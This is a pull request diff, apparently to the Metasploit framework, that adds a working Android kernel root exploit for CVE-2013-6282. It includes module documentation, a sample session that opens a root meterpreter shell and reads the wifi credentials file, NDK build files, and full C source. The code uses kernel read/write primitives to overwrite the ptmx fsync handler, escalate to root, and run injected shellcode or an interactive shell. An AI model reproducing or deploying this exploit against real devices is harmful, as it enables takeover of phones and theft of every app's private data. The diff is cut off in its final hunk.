### PR TITLE
add CVE-2013-6282, put_user/get_user exploit for Android

### DIFF
--- a/documentation/modules/exploit/android/local/put_user_vroot.md
+++ b/documentation/modules/exploit/android/local/put_user_vroot.md
@@ -4,6 +4,8 @@ This modules exploits a vulnerability in the linux kernel on an Android device, 
 
 The exploit uses a read kernel memory primitive to first figure out the correct offsets for the device, before using the write primitive to overwrite the ptmx.fsync handler to a function that will elevate the current process to root. Finally /dev/ptmx is opened, and fsync called to trigger the exploit.
 
+This exploit should work on any vulnerable device and is not device specific. In the example below a Samsung Galaxy S4 running Android version 4.3 was targetted.
+
 ## Usage
 
 You'll first need to obtain a session on the target device. Once the module is loaded, one simply needs to set the ```SESSION``` option and configure the handler. The exploit can take a while to run on the device so it is configured with ```WfsDelay``` option to wait 120 seconds for a session. If you have not had a session after this time you can assume the device is not vulnerable.

--- a/documentation/modules/exploit/android/local/put_user_vroot.md
+++ b/documentation/modules/exploit/android/local/put_user_vroot.md
@@ -1,0 +1,53 @@
+## Intro
+
+This modules exploits a vulnerability in the linux kernel on an Android device, which allows an untrusted app to elevate to root priviledges. On Android an application normally runs as an individual linux user, sandboxing it from the Android system and other applications. After running the exploit the resulting session has full priviledge on the device, and can access the entire filesystem and the private data files of every other app, including system apps.
+
+The exploit uses a read kernel memory primitive to first figure out the correct offsets for the device, before using the write primitive to overwrite the ptmx.fsync handler to a function that will elevate the current process to root. Finally /dev/ptmx is opened, and fsync called to trigger the exploit.
+
+## Usage
+
+You'll first need to obtain a session on the target device. Once the module is loaded, one simply needs to set the ```SESSION``` option and configure the handler. The exploit can take a while to run on the device so it is configured with ```WfsDelay``` option to wait 120 seconds for a session. If you have not had a session after this time you can assume the device is not vulnerable.
+
+An example session follows:
+
+
+```
+msf exploit(handler) > sessions 
+
+Active sessions
+===============
+
+  Id  Type                        Information          Connection
+  --  ----                        -----------          ----------
+  1   meterpreter dalvik/android  u0_a132 @ localhost  192.168.1.52:4444 -> 192.168.1.54:33549 (192.168.1.54)
+
+
+msf exploit(handler) > use exploit/android/local/put_user_vroot
+
+msf exploit(put_user_vroot) > set LHOST 192.168.1.52
+LHOST => 192.168.1.52
+
+msf exploit(put_user_vroot) > set LPORT 5555
+LPORT => 5555
+
+msf exploit(put_user_vroot) > set SESSION 1
+SESSION => 1
+
+msf exploit(put_user_vroot) > run
+
+[*] Started reverse TCP handler on 192.168.1.52:5555 
+[*] Loading exploit library /data/data/com.metasploit.stage/files/bwycy
+[*] Loaded library /data/data/com.metasploit.stage/files/bwycy, deleting
+[*] Waiting 120 seconds for payload
+[*] Sending stage (388156 bytes) to 192.168.1.54
+[*] Meterpreter session 2 opened (192.168.1.52:5555 -> 192.168.1.54:59580) at 2016-12-24 00:19:12 +0800
+
+
+meterpreter > getuid 
+Server username: uid=0, gid=0, euid=0, egid=0
+
+meterpreter > cat /data/misc/wifi/wpa_supplicant.conf
+ctrl_interface=wlan0
+...
+
+```

--- a/external/source/exploits/CVE-2013-6282/Android.mk
+++ b/external/source/exploits/CVE-2013-6282/Android.mk
@@ -1,0 +1,21 @@
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+#LOCAL_LDFLAGS   += -llog
+#LOCAL_CFLAGS    += -DDEBUG
+LOCAL_MODULE    := exploit
+LOCAL_SRC_FILES := exploit.c
+
+include $(BUILD_SHARED_LIBRARY)
+
+include $(CLEAR_VARS)
+
+LOCAL_LDFLAGS   += -llog
+LOCAL_CFLAGS    += -DDEBUG
+LOCAL_MODULE    := debugexploit
+LOCAL_SRC_FILES := exploit.c
+
+include $(BUILD_EXECUTABLE)
+
+

--- a/external/source/exploits/CVE-2013-6282/Makefile
+++ b/external/source/exploits/CVE-2013-6282/Makefile
@@ -1,0 +1,19 @@
+
+all: install
+
+build:
+	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk
+
+install: build
+	mv libs/armeabi/libexploit.so ../../../../data/exploits/CVE-2013-6282.so
+
+push: build
+	adb push libs/armeabi/debugexploit /data/local/tmp/exploit
+
+run: push
+	adb shell 'cd /data/local/tmp/exploit'
+
+clean:
+	rm -rf libs
+	rm -rf obj
+

--- a/external/source/exploits/CVE-2013-6282/Makefile
+++ b/external/source/exploits/CVE-2013-6282/Makefile
@@ -2,7 +2,7 @@
 all: install
 
 build:
-	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
+	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16 APP_ABI=armeabi
 
 install: build
 	mv libs/armeabi/libexploit.so ../../../../data/exploits/CVE-2013-6282.so

--- a/external/source/exploits/CVE-2013-6282/Makefile
+++ b/external/source/exploits/CVE-2013-6282/Makefile
@@ -2,7 +2,7 @@
 all: install
 
 build:
-	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk
+	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
 
 install: build
 	mv libs/armeabi/libexploit.so ../../../../data/exploits/CVE-2013-6282.so
@@ -11,7 +11,8 @@ push: build
 	adb push libs/armeabi/debugexploit /data/local/tmp/exploit
 
 run: push
-	adb shell 'cd /data/local/tmp/exploit'
+	adb shell 'chmod 777 /data/local/tmp/exploit'
+	adb shell '/data/local/tmp/exploit'
 
 clean:
 	rm -rf libs

--- a/external/source/exploits/CVE-2013-6282/Readme.md
+++ b/external/source/exploits/CVE-2013-6282/Readme.md
@@ -1,0 +1,11 @@
+
+BUILDING:
+
+Download the android ndk, e.g:
+https://dl.google.com/android/repository/android-ndk-r10e-linux-x86_64.zip
+(I used android-ndk-10d)
+
+Unzip it and install ensure ndk-build is in your PATH
+
+make
+

--- a/external/source/exploits/CVE-2013-6282/exploit.c
+++ b/external/source/exploits/CVE-2013-6282/exploit.c
@@ -1,0 +1,711 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/ptrace.h>
+#include <sys/syscall.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <jni.h>
+
+unsigned char shellcode_buf[2048] = { 0x90, 0x90, 0x90, 0x90 };
+
+#define KERNEL_START_ADDRESS 0xc0008000
+#define KERNEL_SIZE 0x2000000
+#define SEARCH_START_ADDRESS 0xc0800000
+#define KALLSYMS_SIZE 0x200000
+#define PTMX_DEVICE "/dev/ptmx"
+
+#ifdef DEBUG
+#include <android/log.h>
+#define LOGV(...) __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout)
+#else
+#define LOGV(...) 
+#endif
+
+unsigned long prepare_kernel_cred_address = 0;
+unsigned long commit_creds_address = 0;
+unsigned long ptmx_fops_address = 0;
+unsigned long ptmx_open_address = 0;
+unsigned long tty_init_dev_address = 0;
+unsigned long tty_release_address = 0;
+unsigned long tty_fasync_address = 0;
+unsigned long ptm_driver_address = 0;
+
+unsigned long pattern_kallsyms_addresses[] = {
+	0xc0008000,	/* stext */
+	0xc0008000,	/* _sinittext */
+	0xc0008000,	/* _stext */
+	0xc0008000	/* __init_begin */
+};
+unsigned long pattern_kallsyms_addresses2[] = {
+	0xc0008000,	/* stext */
+	0xc0008000	/* _text */
+};
+unsigned long pattern_kallsyms_addresses3[] = {
+	0xc00081c0,	/* asm_do_IRQ */
+	0xc00081c0,	/* _stext */
+	0xc00081c0	/* __exception_text_start */
+};
+
+unsigned long *kallsymsmem = NULL;
+unsigned long kallsyms_num_syms;
+unsigned long *kallsyms_addresses;
+unsigned char *kallsyms_names;
+unsigned char *kallsyms_token_table;
+unsigned short *kallsyms_token_index;
+unsigned long *kallsyms_markers;
+
+struct cred;
+struct task_struct;
+
+struct cred *(*prepare_kernel_cred)(struct task_struct *);
+int (*commit_creds)(struct cred *);
+
+bool bChiled;
+
+int read_value_at_address(unsigned long address, unsigned long *value) {
+	int sock;
+	int ret;
+	int i;
+	unsigned long addr = address;
+	unsigned char *pval = (unsigned char *)value;
+	socklen_t optlen = 1;
+
+	*value = 0;
+	errno = 0;
+	sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
+	if (sock < 0) {
+		LOGV("socket() failed: %s.\n", strerror(errno));
+		return -1;
+	}
+
+	for (i = 0; i < sizeof(*value); i++, addr++, pval++) {
+		errno = 0;
+		ret = setsockopt(sock, SOL_IP, IP_TTL, (void *)addr, 1);
+		if (ret != 0) {
+			if (errno != EINVAL) {
+				LOGV("setsockopt() failed: %s.\n", strerror(errno));
+				close(sock);
+				*value = 0;
+				return -1;
+			}
+		}
+		errno = 0;
+		ret = getsockopt(sock, SOL_IP, IP_TTL, pval, &optlen);
+		if (ret != 0) {
+			LOGV("getsockopt() failed: %s.\n", strerror(errno));
+			close(sock);
+			*value = 0;
+			return -1;
+		}
+	}
+
+	close(sock);
+
+	return 0;
+}
+
+unsigned long *kerneldump(unsigned long startaddr, unsigned long dumpsize) {
+	unsigned long addr;
+	unsigned long val;
+	unsigned long *allocaddr;
+	unsigned long *memaddr;
+
+	LOGV("dumping kernel...\n");
+	allocaddr = (unsigned long *)malloc(dumpsize);
+	if (allocaddr == NULL) {
+		LOGV("malloc failed: %s.\n", strerror(errno));
+		return NULL;
+	}
+	memaddr = allocaddr;
+
+	for (addr = startaddr; addr < (startaddr + dumpsize); addr += 4, memaddr++) {
+		if (read_value_at_address(addr, &val) != 0) {
+			LOGV("kerneldump failed: %s.\n", strerror(errno));
+			return NULL;
+		}
+		*memaddr = val;
+	}
+
+	return allocaddr;
+}
+
+int check_pattern(unsigned long *addr, unsigned long *pattern, int patternnum) {
+	unsigned long val;
+	unsigned long cnt;
+	unsigned long i;
+
+	read_value_at_address((unsigned long)addr, &val);
+	if (val == pattern[0]) {
+		cnt = 1;
+		for (i = 1; i < patternnum; i++) {
+			read_value_at_address((unsigned long)(&addr[i]), &val);
+			if (val == pattern[i]) {
+				cnt++;
+			} else {
+				break;
+			}
+		}
+		if (cnt == patternnum) {
+			return 0;
+		}
+	}
+
+	return -1;
+}
+
+int check_kallsyms_header(unsigned long *addr) {
+	if (check_pattern(addr, pattern_kallsyms_addresses, sizeof(pattern_kallsyms_addresses) / 4) == 0) {
+		return 0;
+	} else if (check_pattern(addr, pattern_kallsyms_addresses2, sizeof(pattern_kallsyms_addresses2) / 4) == 0) {
+		return 0;
+	} else if (check_pattern(addr, pattern_kallsyms_addresses3, sizeof(pattern_kallsyms_addresses3) / 4) == 0) {
+		return 0;
+	}
+
+	return -1;
+}
+
+int get_kallsyms_addresses() {
+	unsigned long *endaddr;
+	unsigned long i, j;
+	unsigned long *addr;
+	unsigned long n;
+	unsigned long val;
+	unsigned long off;
+
+	if (read_value_at_address(KERNEL_START_ADDRESS, &val) != 0) {
+		LOGV("this device is not supported.\n");
+		return -1;
+	}
+	LOGV("search kallsyms...\n");
+	endaddr = (unsigned long *)(KERNEL_START_ADDRESS + KERNEL_SIZE);
+	for (i = 0; i < (KERNEL_START_ADDRESS + KERNEL_SIZE - SEARCH_START_ADDRESS); i += 16) {
+		for (j = 0; j < 2; j++) {
+			/* get kallsyms_addresses pointer */
+			if (j == 0) {
+				kallsyms_addresses = (unsigned long *)(SEARCH_START_ADDRESS + i);
+			} else {
+				if ((i == 0) || ((SEARCH_START_ADDRESS - i) < KERNEL_START_ADDRESS)) {
+					continue;
+				}
+				kallsyms_addresses = (unsigned long *)(SEARCH_START_ADDRESS - i);
+			}
+			if (check_kallsyms_header(kallsyms_addresses) != 0) {
+				continue;
+			}
+			addr = kallsyms_addresses;
+			off = 0;
+
+			/* search end of kallsyms_addresses */
+			n = 0;
+			while (1) {
+				read_value_at_address((unsigned long)addr, &val);
+				if (val < KERNEL_START_ADDRESS) {
+					break;
+				}
+				n++;
+				addr++;
+				off++;
+				if (addr >= endaddr) {
+					return -1;
+				}
+			}
+
+			/* skip there is filled by 0x0 */
+			while (1) {
+				read_value_at_address((unsigned long)addr, &val);
+				if (val != 0) {
+					break;
+				}
+				addr++;
+				off++;
+				if (addr >= endaddr) {
+					return -1;
+				}
+			}
+
+			read_value_at_address((unsigned long)addr, &val);
+			kallsyms_num_syms = val;
+			addr++;
+			off++;
+			if (addr >= endaddr) {
+				return -1;
+			}
+
+			/* check kallsyms_num_syms */
+			if (kallsyms_num_syms != n) {
+				continue;
+			}
+
+			LOGV("kallsyms_addresses=%08lx\n", (unsigned long)kallsyms_addresses);
+			LOGV("kallsyms_num_syms=%08lx\n", kallsyms_num_syms);
+			kallsymsmem = kerneldump((unsigned long)kallsyms_addresses, KALLSYMS_SIZE);
+			if (kallsymsmem == NULL) {
+				return -1;
+			}
+			kallsyms_addresses = kallsymsmem;
+			endaddr = (unsigned long *)((unsigned long)kallsymsmem + KALLSYMS_SIZE);
+
+			addr = &kallsymsmem[off];
+
+			/* skip there is filled by 0x0 */
+			while (addr[0] == 0x00000000) {
+				addr++;
+				if (addr >= endaddr) {
+					return -1;
+				}
+			}
+
+			kallsyms_names = (unsigned char *)addr;
+
+			/* search end of kallsyms_names */
+			for (i = 0, off = 0; i < kallsyms_num_syms; i++) {
+				int len = kallsyms_names[off];
+				off += len + 1;
+				if (&kallsyms_names[off] >= (unsigned char *)endaddr) {
+					return -1;
+				}
+			}
+
+			/* adjust */
+			addr = (unsigned long *)((((unsigned long)&kallsyms_names[off] - 1) | 0x3) + 1);
+			if (addr >= endaddr) {
+				return -1;
+			}
+
+			/* skip there is filled by 0x0 */
+			while (addr[0] == 0x00000000) {
+				addr++;
+				if (addr >= endaddr) {
+					return -1;
+				}
+			}
+			/* but kallsyms_markers shoud be start 0x00000000 */
+			addr--;
+
+			kallsyms_markers = addr;
+
+			/* end of kallsyms_markers */
+			addr = &kallsyms_markers[((kallsyms_num_syms - 1) >> 8) + 1];
+			if (addr >= endaddr) {
+				return -1;
+			}
+
+			/* skip there is filled by 0x0 */
+			while (addr[0] == 0x00000000) {
+				addr++;
+				if (addr >= endaddr) {
+					return -1;
+				}
+			}
+
+			kallsyms_token_table = (unsigned char *)addr;
+
+			i = 0;
+			while ((kallsyms_token_table[i] != 0x00) || (kallsyms_token_table[i + 1] != 0x00)) {
+				i++;
+				if (&kallsyms_token_table[i - 1] >= (unsigned char *)endaddr) {
+					return -1;
+				}
+			}
+
+			/* skip there is filled by 0x0 */
+			while (kallsyms_token_table[i] == 0x00) {
+				i++;
+				if (&kallsyms_token_table[i - 1] >= (unsigned char *)endaddr) {
+					return -1;
+				}
+			}
+
+			/* but kallsyms_markers shoud be start 0x0000 */
+			kallsyms_token_index = (unsigned short *)&kallsyms_token_table[i - 2];
+
+			return 0;
+		}
+	}
+	return -1;
+}
+
+unsigned long kallsyms_expand_symbol(unsigned long off, char *namebuf) {
+	int len;
+	int skipped_first;
+	unsigned char *tptr;
+	unsigned char *data;
+
+	/* Get the compressed symbol length from the first symbol byte. */
+	data = &kallsyms_names[off];
+	len = *data;
+	off += len + 1;
+	data++;
+
+	skipped_first = 0;
+	while (len > 0) {
+		tptr = &kallsyms_token_table[kallsyms_token_index[*data]];
+		data++;
+		len--;
+
+		while (*tptr > 0) {
+			if (skipped_first != 0) {
+				*namebuf = *tptr;
+				namebuf++;
+			} else {
+				skipped_first = 1;
+			}
+			tptr++;
+		}
+	}
+	*namebuf = '\0';
+
+	return off;
+}
+
+int search_functions() {
+	char namebuf[1024];
+	unsigned long i;
+	unsigned long off;
+	int cnt;
+
+	cnt = 0;
+	for (i = 0, off = 0; i < kallsyms_num_syms; i++) {
+		off = kallsyms_expand_symbol(off, namebuf);
+		if (strcmp(namebuf, "prepare_kernel_cred") == 0) {
+			prepare_kernel_cred_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "commit_creds") == 0) {
+			commit_creds_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "ptmx_open") == 0) {
+			ptmx_open_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "tty_init_dev") == 0) {
+			tty_init_dev_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "tty_release") == 0) {
+			tty_release_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "tty_fasync") == 0) {
+			tty_fasync_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "ptmx_fops") == 0) {
+			ptmx_fops_address = kallsyms_addresses[i];
+		}
+	}
+
+	if (cnt < 6) {
+		return -1;
+	}
+
+	return 0;
+}
+
+void analyze_ptmx_open() {
+	unsigned long i, j, k;
+	unsigned long addr;
+	unsigned long val;
+	unsigned long regnum;
+	unsigned long data_addr;
+
+	LOGV("analyze ptmx_open...\n");
+	for (i = 0; i < 0x200; i += 4) {
+		addr = ptmx_open_address + i;
+		read_value_at_address(addr, &val);
+		if ((val & 0xff000000) == 0xeb000000) {
+			if ((((tty_init_dev_address / 4) - (addr / 4 + 2)) & 0x00ffffff) == (val & 0x00ffffff)) {
+				for (j = 1; j <= i; j++) {
+					addr = ptmx_open_address + i - j;
+					read_value_at_address(addr, &val);
+					if ((val & 0xfff0f000) == 0xe5900000) {
+						regnum = (val & 0x000f0000) >> 16;
+						for (k = 1; k <= (i - j); k++) {
+							addr = ptmx_open_address + i - j - k;
+							read_value_at_address(addr, &val);
+							if ((val & 0xfffff000) == (0xe59f0000 + (regnum << 12))) {
+								data_addr = addr + (val & 0x00000fff) + 8;
+								read_value_at_address(data_addr, &val);
+								ptm_driver_address = val;
+								return;
+							}
+						}
+					}
+				}
+			}
+		}
+	}
+
+	return;
+}
+
+unsigned long search_ptmx_fops_address() {
+	unsigned long *addr;
+	unsigned long range;
+	unsigned long *ptmx_fops_open;
+	unsigned long i;
+	unsigned long val, val2, val5;
+
+	LOGV("search ptmx_fops...\n");
+	if (ptm_driver_address != 0) {
+		addr = (unsigned long *)ptm_driver_address;
+	} else {
+		addr = (unsigned long *)(kallsyms_addresses[kallsyms_num_syms - 1]);
+	}
+	addr++;
+	ptmx_fops_open = NULL;
+	range = ((KERNEL_START_ADDRESS + KERNEL_SIZE) - (unsigned long)addr) / sizeof(unsigned long);
+	for (i = 0; i < range - 14; i++) {
+		read_value_at_address((unsigned long)(&addr[i]), &val);
+		if (val == ptmx_open_address) {
+			read_value_at_address((unsigned long)(&addr[i + 2]), &val2);
+			if (val2 == tty_release_address) {
+				read_value_at_address((unsigned long)(&addr[i + 5]), &val5);
+				if (val5 == tty_fasync_address) {
+					ptmx_fops_open = &addr[i];
+					break;
+				}
+			}
+		}
+	}
+
+	if (ptmx_fops_open == NULL) {
+		return 0;
+	}
+	return ((unsigned long)ptmx_fops_open - 0x2c);
+}
+
+int get_addresses() {
+	prepare_kernel_cred_address = 0;
+	commit_creds_address = 0;
+	ptmx_fops_address = 0;
+	ptmx_open_address = 0;
+	tty_init_dev_address = 0;
+	tty_release_address = 0;
+	tty_fasync_address = 0;
+	ptm_driver_address = 0;
+
+	if (get_kallsyms_addresses() != 0) {
+		if (kallsymsmem != NULL) {
+			free(kallsymsmem);
+			kallsymsmem = NULL;
+		}
+		LOGV("kallsyms_addresses search failed.\n");
+		return -1;
+	}
+
+	if (search_functions() != 0) {
+		if (kallsymsmem != NULL) {
+			free(kallsymsmem);
+			kallsymsmem = NULL;
+		}
+		LOGV("search_functions failed.\n");
+		return -1;
+	}
+
+	if (ptmx_fops_address == 0) {
+		analyze_ptmx_open();
+		ptmx_fops_address = search_ptmx_fops_address();
+		if (ptmx_fops_address == 0) {
+			if (kallsymsmem != NULL) {
+				free(kallsymsmem);
+				kallsymsmem = NULL;
+			}
+			LOGV("search_ptmx_fops_address failed.\n");
+			return -1;
+		}
+	}
+
+	if (kallsymsmem != NULL) {
+		free(kallsymsmem);
+		kallsymsmem = NULL;
+	}
+
+	LOGV("\n");
+	LOGV("prepare_kernel_cred=%08lx\n", prepare_kernel_cred_address);
+	LOGV("commit_creds=%08lx\n", commit_creds_address);
+	LOGV("ptmx_fops=%08lx\n", ptmx_fops_address);
+	LOGV("ptmx_open=%08lx\n", ptmx_open_address);
+	LOGV("tty_init_dev=%08lx\n", tty_init_dev_address);
+	LOGV("tty_release=%08lx\n", tty_release_address);
+	LOGV("tty_fasync=%08lx\n", tty_fasync_address);
+	LOGV("ptm_driver=%08lx\n", ptm_driver_address);
+	LOGV("\n");
+
+	return 0;
+}
+
+void obtain_root_privilege(void) {
+	commit_creds(prepare_kernel_cred(0));
+}
+
+static bool run_obtain_root_privilege(void *user_data) {
+	int fd;
+
+	fd = open(PTMX_DEVICE, O_WRONLY);
+	fsync(fd);
+	close(fd);
+
+	return true;
+}
+
+/*
+void ptrace_write_value_at_address(unsigned long int address, void *value) {
+	pid_t pid;
+	long ret;
+	int status;
+
+	bChiled = false;
+	pid = fork();
+	if (pid < 0) {
+		return;
+	}
+	if (pid == 0) {
+		ret = ptrace(PTRACE_TRACEME, 0, 0, 0);
+		if (ret < 0) {
+			LOGV("PTRACE_TRACEME failed\n");
+		}
+		bChiled = true;
+		signal(SIGSTOP, SIG_IGN);
+		kill(getpid(), SIGSTOP);
+		exit(EXIT_SUCCESS);
+	}
+
+	do {
+		ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, pid, &bChiled, &bChiled);
+	} while (!bChiled);
+
+	ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, pid, &value, (void *)address);
+	if (ret < 0) {
+		LOGV("PTRACE_PEEKDATA failed: %s\n", strerror(errno));
+	}
+
+	kill(pid, SIGKILL);
+	waitpid(pid, &status, WNOHANG);
+}
+*/
+
+int pipe_write_value_at_address(unsigned long address, void* value)  
+{  
+    char data[4];  
+    int pipefd[2];  
+    int i;  
+  
+    *(long *)&data = (long)value;  
+  
+    if (pipe(pipefd) == -1) {  
+        perror("pipe");  
+        return 1;  
+    }  
+  
+    for (i = 0; i < (int) sizeof(data) ; i++) {  
+        char buf[256];  
+        buf[0] = 0;  
+        if (data[i]) {  
+            if (write(pipefd[1], buf, data[i]) != data[i]) {  
+                printf("error in write().\n");  
+                break;  
+            }  
+        }  
+  
+        if (ioctl(pipefd[0], FIONREAD, (void *)(address + i)) == -1) {  
+            perror("ioctl");  
+            break;  
+        }  
+  
+        if (data[i]) {  
+            if (read(pipefd[0], buf, sizeof buf) != data[i]) {  
+                printf("error in read().\n");  
+                break;  
+            }  
+        }  
+    }  
+  
+    close(pipefd[0]);  
+    close(pipefd[1]);  
+  
+    return (i == sizeof (data));  
+}  
+
+bool overwrite_ptmx_fsync_address(unsigned long int address, void *value, bool (*exploit_callback)(void *user_data), void *user_data) {
+	bool success;
+
+	/*ptrace_write_value_at_address(address, value);*/
+	pipe_write_value_at_address(address, value);
+	success = exploit_callback(user_data);
+
+	return success;
+}
+
+static bool run_exploit(void) {
+	unsigned long int ptmx_fops_fsync_address;
+
+	prepare_kernel_cred = (void *)prepare_kernel_cred_address;
+	commit_creds = (void *)commit_creds_address;
+
+	ptmx_fops_fsync_address = ptmx_fops_address + 0x38;
+	return overwrite_ptmx_fsync_address(ptmx_fops_fsync_address, &obtain_root_privilege, run_obtain_root_privilege, NULL);
+}
+
+void init_exploit() {
+
+	if (get_addresses() != 0) {
+		LOGV("Failed to get addresses.\n");
+		exit(EXIT_FAILURE);
+	}
+
+	run_exploit();
+
+	int uid = getuid();
+	if (uid != 0) {
+		LOGV("Failed to get root.\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (shellcode_buf[0] == 0x90) {
+		LOGV("No shellcode, uid=%d\n", uid);
+		exit(EXIT_SUCCESS);
+	}
+	LOGV("running shellcode, uid=%d\n", uid);
+
+	int pid = fork();
+	LOGV("onload, pid=%d\n", pid);
+	if (pid == 0) {
+		void *ptr = mmap(0, sizeof(shellcode_buf), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+		if (ptr == MAP_FAILED) {
+			exit(EXIT_FAILURE);
+		}
+		memcpy(ptr, shellcode_buf, sizeof(shellcode_buf));
+		void (*shellcode)() = (void(*)())ptr;
+		shellcode();
+	}
+	LOGV("finished, pid=%d\n", pid);
+
+	LOGV("exiting.\n");
+}
+
+int main(int argc, char **argv) {
+
+	init_exploit();
+
+	exit(EXIT_SUCCESS);
+}
+
+JNIEXPORT jint JNICALL JNI_OnLoad( JavaVM *vm, void *pvt )
+{
+	JNIEnv *env;
+	LOGV("onload, uid=%d\n", getuid());
+
+	if((*vm)->GetEnv(vm, (void **)&env, JNI_VERSION_1_4) != JNI_OK)
+	{
+		return -1;
+	}
+
+	init_exploit();
+	return JNI_VERSION_1_4;
+}
+
+JNIEXPORT void JNICALL JNI_OnUnload( JavaVM *vm, void *pvt )
+{
+}

--- a/external/source/exploits/CVE-2013-6282/exploit.c
+++ b/external/source/exploits/CVE-2013-6282/exploit.c
@@ -21,7 +21,7 @@ unsigned char shellcode_buf[2048] = { 0x90, 0x90, 0x90, 0x90 };
 
 #ifdef DEBUG
 #include <android/log.h>
-#define LOGV(...) __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout)
+#define LOGV(...) __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); fflush(stdout)
 #else
 #define LOGV(...) 
 #endif

--- a/external/source/exploits/CVE-2013-6282/exploit.c
+++ b/external/source/exploits/CVE-2013-6282/exploit.c
@@ -604,7 +604,7 @@ int pipe_write_value_at_address(unsigned long address, void* value)
         buf[0] = 0;  
         if (data[i]) {  
             if (write(pipefd[1], buf, data[i]) != data[i]) {  
-                printf("error in write().\n");  
+                LOGV("error in write().\n");  
                 break;  
             }  
         }  
@@ -616,7 +616,7 @@ int pipe_write_value_at_address(unsigned long address, void* value)
   
         if (data[i]) {  
             if (read(pipefd[0], buf, sizeof buf) != data[i]) {  
-                printf("error in read().\n");  
+                LOGV("error in read().\n");  
                 break;  
             }  
         }  
@@ -665,6 +665,7 @@ void init_exploit() {
 
 	if (shellcode_buf[0] == 0x90) {
 		LOGV("No shellcode, uid=%d\n", uid);
+		system("/system/bin/sh -i");
 		return;
 	}
 	LOGV("running shellcode, uid=%d\n", uid);

--- a/external/source/exploits/CVE-2013-6282/exploit.c
+++ b/external/source/exploits/CVE-2013-6282/exploit.c
@@ -50,6 +50,11 @@ unsigned long pattern_kallsyms_addresses3[] = {
 	0xc00081c0,	/* _stext */
 	0xc00081c0	/* __exception_text_start */
 };
+unsigned long pattern_kallsyms_addresses4[] = {
+	0xc0008180,
+	0xc0008180,
+	0xc0008180
+};
 
 unsigned long *kallsymsmem = NULL;
 unsigned long kallsyms_num_syms;
@@ -134,13 +139,12 @@ unsigned long *kerneldump(unsigned long startaddr, unsigned long dumpsize) {
 	return allocaddr;
 }
 
-int check_pattern(unsigned long *addr, unsigned long *pattern, int patternnum) {
+int check_pattern(unsigned long *addr, unsigned long firstval, unsigned long *pattern, int patternnum) {
 	unsigned long val;
 	unsigned long cnt;
 	unsigned long i;
 
-	read_value_at_address((unsigned long)addr, &val);
-	if (val == pattern[0]) {
+	if (firstval == pattern[0]) {
 		cnt = 1;
 		for (i = 1; i < patternnum; i++) {
 			read_value_at_address((unsigned long)(&addr[i]), &val);
@@ -159,11 +163,16 @@ int check_pattern(unsigned long *addr, unsigned long *pattern, int patternnum) {
 }
 
 int check_kallsyms_header(unsigned long *addr) {
-	if (check_pattern(addr, pattern_kallsyms_addresses, sizeof(pattern_kallsyms_addresses) / 4) == 0) {
+	unsigned long val;
+	read_value_at_address((unsigned long)addr, &val);
+
+	if (check_pattern(addr, val, pattern_kallsyms_addresses, sizeof(pattern_kallsyms_addresses) / 4) == 0) {
 		return 0;
-	} else if (check_pattern(addr, pattern_kallsyms_addresses2, sizeof(pattern_kallsyms_addresses2) / 4) == 0) {
+	} else if (check_pattern(addr, val, pattern_kallsyms_addresses2, sizeof(pattern_kallsyms_addresses2) / 4) == 0) {
 		return 0;
-	} else if (check_pattern(addr, pattern_kallsyms_addresses3, sizeof(pattern_kallsyms_addresses3) / 4) == 0) {
+	} else if (check_pattern(addr, val, pattern_kallsyms_addresses3, sizeof(pattern_kallsyms_addresses3) / 4) == 0) {
+		return 0;
+	} else if (check_pattern(addr, val, pattern_kallsyms_addresses4, sizeof(pattern_kallsyms_addresses4) / 4) == 0) {
 		return 0;
 	}
 

--- a/external/source/exploits/CVE-2013-6282/exploit.c
+++ b/external/source/exploits/CVE-2013-6282/exploit.c
@@ -569,7 +569,7 @@ void ptrace_write_value_at_address(unsigned long int address, void *value) {
 		bChiled = true;
 		signal(SIGSTOP, SIG_IGN);
 		kill(getpid(), SIGSTOP);
-		exit(EXIT_SUCCESS);
+		return;
 	}
 
 	do {
@@ -652,7 +652,7 @@ void init_exploit() {
 
 	if (get_addresses() != 0) {
 		LOGV("Failed to get addresses.\n");
-		exit(EXIT_FAILURE);
+		return;
 	}
 
 	run_exploit();
@@ -660,12 +660,12 @@ void init_exploit() {
 	int uid = getuid();
 	if (uid != 0) {
 		LOGV("Failed to get root.\n");
-		exit(EXIT_FAILURE);
+		return;
 	}
 
 	if (shellcode_buf[0] == 0x90) {
 		LOGV("No shellcode, uid=%d\n", uid);
-		exit(EXIT_SUCCESS);
+		return;
 	}
 	LOGV("running shellcode, uid=%d\n", uid);
 
@@ -674,7 +674,7 @@ void init_exploit() {
 	if (pid == 0) {
 		void *ptr = mmap(0, sizeof(shellcode_buf), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
 		if (ptr == MAP_FAILED) {
-			exit(EXIT_FAILURE);
